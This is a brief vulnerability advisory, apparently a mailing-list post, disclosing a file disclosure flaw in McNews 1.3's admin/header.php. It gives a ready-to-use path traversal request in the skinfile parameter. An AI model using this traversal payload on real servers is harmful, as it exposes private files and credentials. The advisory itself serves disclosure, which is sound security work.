McNews 1.3 : File Disclosure Vulnerability

[Sebastien Lelarge <sebastien.lelarge@xxxxxxxxxxxxxxxx>]

The vulnerable script is <mcnews_root>/admin/header.php

Exploit it with : header.php?voir=1&skinfile=skin/../../../file/to/view